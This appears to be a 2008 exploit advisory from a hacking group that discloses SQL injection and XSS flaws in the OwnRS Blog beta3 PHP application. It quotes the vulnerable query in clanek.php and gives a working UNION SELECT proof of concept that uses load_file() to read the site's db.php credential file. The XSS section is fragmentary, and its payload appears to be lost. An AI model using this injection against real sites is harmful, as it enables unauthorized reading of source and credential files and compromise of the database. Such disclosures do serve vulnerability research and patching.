============================================================== OwnRS Blog beta3 (SQL/XSS) Multiple Remote Vulnerabilities ============================================================== ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 19 June 2008 SITE : www.citec.us ##################################################### APPLICATION : OwnRS VERSION : Beta3 VENDOR : N/A DOWNLOAD : http://downloads.sourceforge.net/ownrs ##################################################### --- Remote SQL Injection --- **magic_quote must turn off** ------------------------------ Vulnerable File (clanek.php) ------------------------------ @ Line 66 [+] $vysledek=mysql_query("select * from clanky where id= '" . $id . "'") or die (mysql_error()); ---------- Exploit ---------- [+] http://[Target]/[Ownrs_path]/clanek.php?id=[SQL Injection] ------------- POC Exploit ------------- [+] http://localhost/own/clanek.php?id=1'/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)),4,5,6,7,8,9,10/**/FROM/**/autori/**/WHERE/**/id='1 When you view source, You can see @Line 87 [+]

[+]

[+] 45

[+]

cara
--------------------- Exploit Description --------------------- This exploit use load_file() to view source files (load_file() can only use with Mysql5+) load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)) will open C:\xampp\htdocs\Own\db.php --- Remote XSS Exploit --- ------------------------------ Vulnerable File (clanek.php) ------------------------------ @ Line 69 [+]

--------- Exploit --------- [+] http://[Target]/[Ownrs_path]/clanek.php?id= ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ##################################################################